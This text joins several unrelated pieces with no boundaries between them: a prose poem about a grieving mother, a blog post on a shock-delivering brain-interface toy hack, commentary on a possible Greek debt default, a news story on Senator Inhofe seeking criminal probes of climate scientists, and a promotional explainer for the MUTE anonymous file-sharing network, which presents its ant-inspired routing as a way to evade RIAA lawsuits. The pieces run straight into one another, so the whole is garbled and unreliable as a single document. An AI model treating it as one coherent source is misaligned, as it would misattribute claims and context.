In the purple gloaming , familiar sounds bloom and unfold all around ; low and resolute crepitations swell up .
The warm summer wind diffuses the sour odor of Mustang vines .
Behind the shed I hold the water hose over the peach tree saplings , and the sound is like the thudding of coins to the ground .
In the distance I see her gliding past tree and shrub .
She roams the fields , a silver negligee floating behind her , a shimmering gauzy film .
She is a wraith , a specter haunted by specters .
She does not know that it is her heart she is searching for .
She does not know that long ago she anchored her heart to her other child , and that now her heart is anchored in a grave on a far hill where a grove of pine trees weaves an eternal nimbus of twilight .
* * *
At night I wake with spasms of fear that she is dying .
She tosses in her bed , across the hallway , and I can hear the cry pivot in the dark .
Please .
Oh please .
It 's the sound of terror and momentarily I am seized with a paroxysm of dread .
Mama , my hoarse shriek calls out to her as I fumble and flop around and around to free myself of sheets .
Flailing in the dark , I stagger across to her room and throw open the door .
But she does not see me ; her mind clutches tenaciously to her dream , unrelenting , siphoning in pieces of reality and weaving them into her nightmare , fashioning sinister , frightful things .
And I realize for the first time that our lives are ruled by shadow and suggestion and very little else .
She chokes back a moan of terror and recoils deeper into her covers , and I know it 's not me whom she sees but my father .
And I can do nothing but squeeze the doorknob and try to hold back the oncoming tears .
Far away the dawn burgeons in roseate skeins .
© 2010 William Cryer .
All rights reserved .
_____________________________________________
ABOUT THE AUTHOR
William Cryer was born and raised in Austin , Texas .
In college he studied English literature and the Romance languages .
Currently he is in his first year of graduate studies .
In further proof that idle engineers are the most evil demographic in the world , I present to you the “ Most Painful Toy Hack Ever ” .
Created by Aaron Rasmussen , co-founder of Harcos Laboratories , this hacked device monitors your brain activity and gives you a scream - out - loud electric shock as soon as you start concentrating as a way of making your friends laugh .
That ’s the sort of mixture of comedy and malevolence you can expect from Harcos .
To promote their energy drinks ( which look like mana potions , and bags of human blood ) they ’ve pulled a lot of crazy stunts using technology .
They ’re sort of the geeky version of Jackass .
Watch the video below to see Rasmussen shock the crap out of himself , his co-founder Elijah Szasz , and the cast of SMBC - Theater .
I never knew such hilarious antics could arise from combining BCI with electroshock therapy .
For a hack of a brain computer interface ( BCI ) , the MPTHE is pretty cheap to build .
Rasmussen says the entire project cost him around $ 105 .
That includes the BCI from a toy called MindFlex ( ~$ 80 + ) , an electric shock card from Qkit ( ~ $ 5 ) , and various electronic parts .
Harcos Labs has placed all the information you need to build your own MPTHE on their website .
I ’m sure hackers everywhere have already started to improve upon the design .
We just saw the release of the first patient - ready BCI on the market .
Maybe with that EEG they ’d be able to do something more productive than shock you .
As brain computer interfaces get more common , and accessible , I ’m sure we ’ll see some really incredible hacks , hopefully not all for evil .
[ image and video credit : Harcos Laboratories ]
[ source : Harcos Laboratories ]
I just had a very interesting conversation poolside at the Beverly Hilton with a couple of high - profile delegates at the Milken Global Conference .
The pool , one level down from where all the panels take place : is clearly the place to be : Arnold Schwarzenegger was just a couple of tables away .
But I doubt he was talking in great depth about the Greek debt situation and what ’s likely to happen there .
I walked away from the conversation decidedly bearish on Greece .
Why ?
It ’s not in the interest of Germany ’s politicians to bail out Greece .
Angela Merkel is taking a hard line on the subject , and you can see why she would — the German electorate has no particular desire to spend billions of euros bailing out the Greeks .
It ’s not even narrowly in the interest of Germany to bail out Greece .
If Germany cares only about itself , rather than the full European Union , then in many ways the best - case scenario for Germany is to see Greece and Portugal default , leave the euro , and then re-enter a few years later at a more competitive exchange rate .
That ’s better than using German funds to try to sustain the national debt of those countries at their present elevated levels .
Even if Germany cares about what might be called “ narrow Europe ” — Germany , France , Benelux — it still might well rather see Greece and Portugal exiled from the euro , thus making it a more credible currency in the eyes of many .
If Germany ca n’t be sure that Greece will avoid default , it would be much better off simply letting Greece go its own way , and then bailing out its domestic banks if Greek did end up defaulting .
The cost of the bank bailout would be lower than the cost of a Greece bailout , and the money would remain within Germany .
If Greek did default , though , make no mistake that massive bank bailouts would be necessary — if not in Germany then certainly in places like Italy .
Hedge funds and distressed investors are n’t going to start buying Greek debt pre-default : they ’re going to wait for the default and the inevitable overshoot in prices , and then buy .
Where would Greek debt trade in the event of a default ?
This is the scariest thing : my highly plugged - in companions both agreed that it would n’t just fall to 70 or even 60 cents on the dollar : they saw fair value closer to 40 , and said that it would probably fall to 30 before people started buying .
Needless to say , if Greek debt was trading at 30 cents on the dollar , it would n’t take long for the Portuguese domino to topple .
After that , Spain — and then , it ’s easy to imagine , Italy , Ireland , UK .
And so the stakes are very high : it ’s certainly cheaper to bail out Greece with virtually unlimited funds than it is to risk a fully - blown PIIGS default .
But there does seem to be the hope or expectation that a line could get drawn in the Iberian sand , and that Italy and Ireland would not be allowed to default even if Portugal and / or Spain imploded .
A couple of high - profile sovereign defaults in Europe would actually be welcomed by the fiscally - responsible wing of the Republican party — the people who want to raise taxes rather than lower them .
The idea here is that there would be a come - to - Jesus moment and lawmakers would suddenly realize how dangerous large sustained deficits can be , and change their wicked ways .
I buy nearly all of this , with the exception of # 6 and # 8 .
My feeling is that a Greek default , while it could in theory be a disorderly and chaotic simple failure to pay , would more likely take the form of a public exchange offer , which would help to put a floor on the price of Greek debt .
And I very much doubt that defaults in southern Europe would improve the fiscal status of the US .
To the contrary , the flight - to - quality trade would just make it even cheaper for the US to borrow money , and the lesson we ’ve all learned many times is that so long as a country has lots of access to cheap money , it ’ll go on borrowing .
But I do think that there ’s a pretty low limit to how much money Germany is going to spend bailing out Greece .
It ’s already bailed out one basket - case European country , when it absorbed East Germany .
It ’s got no appetite to bail out another .
The US Congress 's most ardent global warming sceptic is being accused of turning the row over climate science into a McCarthyite witch - hunt by calling for a criminal investigation of scientists .
Climate scientists say Senator James Inhofe 's call for a criminal investigation into American as well as British scientists who worked on the UN climate body 's report or had communications with East Anglia 's climate research unit represents an attempt to silence debate on the eve of new proposals for a climate change law .
Inhofe 's document ends by naming 17 " key players " in the controversy about CRU 's stolen emails , including the Britons Phil Jones and Keith Briffa .
" I think this is like a drag net , just to try and catch everyone whose name happens to be on this list .
It 's guilt by association and I thought those days were over 50 years ago , " said Michael Oppenheimer , of Princeton University , who is on the list of 17 scientists .
" It looks like a McCarthyite tactic : pull in anyone who had anything to do with anyone because they happened to converse with some by email , and threaten them with criminal activity . "
Inhofe is also accused of further fuelling a spike in hate mail and politically motivated freedom of information requests in the three months since the emails of climate scientists were stolen from the University of East Anglia 's Climatic Research Unit .
Rick Piltz , a former official in the US government climate science programme who now runs the Climate Science Watch website , said Inhofe and others were getting in the way of scientific work .
" Scientists who are working in federal labs are being subjected to inquisitions coming from Congress , " he said .
" There is no question that this is an orchestrated campaign to intimidate scientists . "
Michael Mann , a scientist at Penn State University who is on Inhofe 's list of 17 , said that he had seen a sharp rise in hostile email since November .
" Some of the emails make thinly veiled threats of violence against me and even my family , and law enforcement authorities have been made aware of the matter , " he told the Guardian .
He said the attacks appeared to be a co-ordinated effort .
" Some of them look cut - and - paste . "
A university investigation largely cleared Mann of misconduct for his connection to the East Anglia controversy .
However , a rightwing group in Pennsylvania are demanding further action .
Gavin Schmidt , a climate scientist at Nasa 's Goddard Institute who is also on the list of 17 , said he had seen an increase in freedom of information act requests .
" In my previous six years I dealt with one FoIA request .
In the last three months , we have had to deal with I think eight , " he said .
" These FoIAs are fishing expeditions for potentially embarrassing content but they are not FoIA requests for scientific information . "
He said Inhofe 's call for a criminal investigation created an atmosphere of intimidation .
" The idea very clearly is to let it be known that should you be a scientist who speaks out in public then you will be intimidated , you will be harassed , and you will be threatened , " he said .
" The idea very clearly is to put a chilling effect on scientists speaking out in public and to tell others to keep their heads down .
That kind of intimidation is very reminiscent of other periods in US history where people abused their position . "
Other scientists on Inhofe 's list of 17 admitted they were disturbed by the threat of criminal prosecution .
" I am worried about it , I have to say , " said Raymond Bradley , director of the climate science research centre at the University of Massachusetts Amherst , who is also on the list of 17 .
" You can understand that this powerful person is using the power of his office to intimidate people and to harass people and you wonder whether you should have legal counsel .
It is a very intimidating thing and that is the point . "
Inhofe , an Oklahoma Republican on the Senate 's environment and public works committee , released a document last week suggesting scientists be investigated for breaking three laws and four government regulations .
The document , produced by members of Inhofe 's staff , recycles now familiar sceptic arguments about the stolen emails from East Anglia and the mistakes in the IPCC report .
But climate scientists say the report takes the campaign to a new level by threatening criminal prosecution .
The report calls for the inspector generals of all US government agencies touching on the environment to investigate the scientists as a first step to possible prosecution .
" The minority staff of the Senate committee on environment and public works believe the scientists involved violated fundamental ethical principles governing taxpayer - funded research and , in some cases , may have violated federal laws , " the report says .
A spokesman for Inhofe rejected the charges of a witch - hunt .
But he said a criminal investigation was warranted and that it should not necessarily be limited to the 17 " key players " .
" We are not saying that there are 17 scientists we should be calling criminals , " said Matt Dempsey , a spokesman for Inhofe .
" I 'm not putting a number on 17 . "
He added : " The bottom line though is that there was manipulation of data and it appears that they violated a law . "
" In terms of what these email demonstrate , there are possible criminal violations here with FoIA and other laws . "
Senate leaders are expected to release new proposals for action on climate change as early as this week .
Environmentalists fear the proposal , crafted by a troika of Democratic , Republican , and Independent senators , would weaken a climate change bill passed by the house last June .
The Washington Post reported at the weekend that the senators could scrap a cap - and - trade bill that was the core of the house bill and bring in more limited measures .
[ Français ]
Sponsor List
MUTE protects your privacy by avoiding direct connections with your sharing partners in the network .
Most other file sharing programs use direct connections to download or upload , making your identity available to spies from the RIAA and other unscrupulous organizations .
Read more ...
Ants display collectively intelligent behavior when foraging for food or fighting off predators .
Each ant in the colony acts in a rather simple way , but together they end up doing something clever , like discovering the shortest path between their ant hill and a food source .
MUTE 's routing mechanism is inspired by ant behavior .
Read more ...
MUTE is based on research , and experiments show that it works quite well .
MUTE 's ant - inspired routing is light - weight , robust , and adaptive .
Results from experiments in real MUTE networks show that the collective behavior of MUTE nodes quickly finds the shortest ( or fastest ) routing path between two nodes on the network .
Read more ...
" The RIAA just started bullying Internet users , but they 've been bullying musicians for decades .
By refusing to pay for major label ( RIAA ) music , we can usher in a more fair music business and keep the Internet free ( as in freedom ) . "
-- Holmes Wilson Read more at Downhill Battle ...
How File Sharing Reveals Your Identity Following the death of Napster , all of the file sharing networks that rose to main - stream popularity were decentralized .
The most popular networks include Gnutella ( which powers Limewire , BearShare , and Morpheus ) and FastTrack ( which powers KaZaA and Grokster ) .
The decentralization provides legal protection for the companies that distribute the software , since they do not have to run any component of the network themselves : once you get the software , you become part of the network , and the network could survive even if the parent company disappears .
All of these networks operate as a web or mesh of neighboring node connections .
Your node connects to a few other nodes in the network , and those nodes connect to a few other nodes , which in turn connect to a few other nodes , and so on .
This layout is similar to a real - life social network : you know people , and those people know other people , who in turn know other people , and so on .
A portion of one of these networks might look something like this :
When you search for files in the network , you send a search request to your neighbors , they send the request on to their neighbors , and so on .
Eventually , your request reaches many nodes in the network .
For example , you might send out a search for " metallica mp3 " .
Lots of nodes receive your request , but only a few of them are actually sharing any metallica music .
Those that do have matches send their results back to your node .
These results look something like this :
My Address :
128.223.12.122 My
File :
Metallica__Enter_Sandman.mp3
My Address :
128.223.12.122 My
File :
Metallica__Unforgiven.mp3
My Address :
128.223.12.122 My
File :
Metallica__Everywhere_I_Roam.mp3
Notice the " My Address " portion of these responses .
The address listed is the Internet address of the computer that has the file .
If you are unfamiliar with Internet addresses ( commonly called IP addresses ) , they are like a " phone number " for a computer on the Internet .
Computers use these addresses to make connections to each other over the Internet , and your node can use this address to make a connection to the node that is sharing the three Metallica files shown above .
Also like phone numbers , Internet addresses can be traced to find out who owns them --- we will cover this point in more detail in the next section .
Suppose that the blue node is the node at 128.223.12.122 that returned the three Metallica results :
To download a file from the blue node , your node makes a direct connection to it using the address 128.223.12.122 .
After your node connects to the blue node , the blue node knows your computer 's Internet address as well , say 113.18.92.15 ( going back to the phone analogy , this is like the blue node using caller ID ) .
The blue node sends the Metallica file to you over this connection , and then you close the connection .
This connection , which is separate from the other neighbor connections in the network , would look like this :
Just by performing a search , you got the Internet address of someone who is sharing Metallica .
When you downloaded a file from that person , they got your Internet address as well .
Well , it is only an Internet address , right ?
How the RIAA Finds People to Sue Your Internet Service Provider , or ISP , provides you with your Internet address , much in the same way that your phone company provides you with your phone number .
And , like a phone company , an ISP knows who is using each Internet address that it gives out .
In general , your ISP will keep your identity private .
So , though the person sharing Metallica might contact your ISP and ask , " Who is using 113.18.92.15 ? " , your ISP will likely keep its lips sealed .
Your ISP will keep its lips sealed unless it is scared , an nothing scares an ISP more than the RIAA ( except maybe the FBI and NSA , but so far , these organizations have yet to jump on the anti-file - sharing bandwagon ) .
Suppose that you are sharing a large collection of your favorite music , and assume that your collection contains more than 1000 songs .
Also , suppose that most of the songs in this collection are " owned " by record labels that are represented by the RIAA .
When someone searches for " mp3 " in your file sharing network , your node returns a lot of results .
Now suppose that one of the nodes in the network happens to be owned by the RIAA :
The RIAA performs a search in the network for songs that it cares about .
Since RIAA record labels " own " the vast majority of music that is published in throughout the world , we can simplify things by assuming that the RIAA cares about most songs .
Thus , the RIAA performs a search for " mp3 " , and your node returns over 1000 results , which look something like this :
My Address :
113.18.92.15 My
File :
Madonna__Holiday.mp3
My Address :
113.18.92.15 My
File :
Fleetwood_Mac__Dreams.mp3
My Address :
113.18.92.15 My
File :
Journey__Faithfully.mp3 .
.
. My Address :
113.18.92.15 My
File :
Bonnie_Raitt__Something_To_Talk_About.mp3
My Address :
113.18.92.15 My
File :
Poison__Unskinny_Bop.mp3
Though an average file sharing user would usually initiate a download in response to this gold mine of search results , the RIAA has all the information that it needs , so it stops right here .
With the list of 1000 + infringing songs in hand , it files a subpoena against your ISP ( " Who is using 113.18.92.15 ? " ) and demands that your ISP hand over your personal information .
You can look at an example subpoena , courtesy of the Electronic Frontier Foundation 's online subpoena database .
Once the RIAA has your personal information , it is ready to file a lawsuit against you for copyright infringement .
The Key Privacy Weakness
With standard file sharing networks , the key weakness is that Internet addresses for everyone who is sharing files are readily available .
By sharing copyrighted files without permission , you may be breaking the law as it stands ( though the legality of copyrighted file sharing is still up for debate ) .
Returning to the phone analogy , using standard file sharing networks is much like making prank phone calls to someone who has caller ID --- it is risky and stupid .
With the wide use of caller ID , anyone who makes prank phone calls these days knows to dial " * 67 " before each call to hide his or her identity from the party being called ( a feature commonly called " caller ID blocking " ) .
The reason Internet addresses are available in standard file sharing networks is because they have to be : there is no way to make a direct connection to a node for a download without knowing that node 's Internet address .
Likewise , there is no way for a node to accept your download connection without also being able to determine your Internet address .
Data transmission on the Internet simply works this way , and there is nothing like " caller ID blocking " built into the Internet .
The only way to protect identities is to build something on top of the Internet to avoid direct connections between downloaders and uploaders , and thus avoid the necessity of sharing Internet addresses .
How MUTE Protects Your Privacy
The main way that MUTE protects your privacy is by avoiding direct connections between downloaders and uploaders .
Earlier , we described how search requests are sent around standard networks : you send a search to your neighbors , and they send it to their neighbors , who in turn send it to their neighbors , and so on .
By using the network to route search requests , these networks deliver a particular request to many nodes without making direct connections to any of them .
Of course , when it comes time to transfer a file , these networks use direct connections .
MUTE routes all messages , including search requests , search results , and file transfers , through the network of neighbor connections .
Thus , though you know the Internet addresses of your neighbors , you do not know the Internet address of the node you are downloading from .
A map of a MUTE network looks identical to the maps of standard networks shown earlier .
If you perform a search for " metallica mp3 " , you still might receive back three results , but these results look a little different :
My Address :
7213D...2DCA5 My File :
Metallica__Enter_Sandman.mp3
My Address :
7213D...2DCA5 My File :
Metallica__Unforgiven.mp3
My Address :
7213D...2DCA5 My File :
Metallica__Everywhere_I_Roam.mp3
Notice that the " My Address " portion of these responses no longer contains an Internet address .
The address shown , which is abbreviated with " ... " to fit in the table , is 7213D29781593840CF00CDD1E9A7A425AE16DCA5 .
This is a MUTE " virtual " address .
Each node in the MUTE network has a virtual address that it generates randomly each time it starts up .
Your neighbors in the network ( those nodes that actually do know your Internet address ) do not know what your virtual address is , so no one in the network can connect your virtual address to your Internet address , and thus no one can obtain your real - world identity .
MUTE uses virtual addresses to route messages through the network using an ant - inspired technique .
Thus , to download a metallica file , your node would send a download request through the network to 7213 D ... 2DCA5 , and your node would mark that request with your own virtual address , say D1E9A59380CD425AE16D40CF0CA57A7213D29781 .
The node sharing metallica would send the requested file back to you using your virtual address .
The entire transfer is routed through the network , which would look something like this :
Though the transfer is routed through a node owned by the RIAA , all the node sees are the virtual addresses of you and your file sharing partner .
The RIAA can send out a search for " mp3 " , and it will still get back 1000 results from you , but these results would look like this :
My Address :
D1E9A ...29781 My File :
Madonna__Holiday.mp3
My Address :
D1E9A ...29781 My File :
Fleetwood_Mac__Dreams.mp3
My Address :
D1E9A ...29781 My File :
Journey__Faithfully.mp3 .
.
. My Address :
D1E9A ...29781 My File :
Bonnie_Raitt__Something_To_Talk_About.mp3
My Address :
D1E9A ...29781 My File :
Poison__Unskinny_Bop.mp3
The RIAA can subpoena your ISP using your virtual address , but your ISP does not know who is using this address .
Thus , the RIAA 's standard tactic is useless in the MUTE network .
Another Possible Spy Tactic
Given that the standard search - and - subpoena tactic does not work in a MUTE network , the RIAA might try to target individual nodes with more intense monitoring .
For example , the RIAA might set up a computer on your local network that would listen to all of your Internet traffic ( this is similar to the FBI tapping your phone line ) .
If the RIAA listened to all of your traffic , they would see everything that you sent to each of your neighbors in the MUTE network , which would look something like this :
Notice that the RIAA now has you cornered : it can see that there are download requests coming out of your node , but no corresponding requests coming into your node .
In other words , you must be generating the requests and not simply passing on requests that you have received from your neighbors .
Using this tactic , the RIAA could determine the Internet address associated with your virtual address and then file a subpoena .
How does MUTE block this tactic ?
MUTE protects the contents of each neighbor connection in the network using military - grade encryption .
Though the RIAA might tap your network and see all of your Internet traffic , all MUTE messages would be unreadable .
Thus , the RIAA would not be able to corner you in the network or obtain an Internet address in connection with your virtual address .
Of course , your neighbors are able to decrypt the messages you send through them .
Thus , if the RIAA was able to hijack every single one of your neighbor nodes , it could again corner you and link your Internet address to your virtual address .
However , it is unlikely that the RIAA would be able to take over a large number of nodes in the network , and since you discover your neighbors in a somewhat randomized way , it is unlikely that every single one of your neighbors would be an RIAA node .
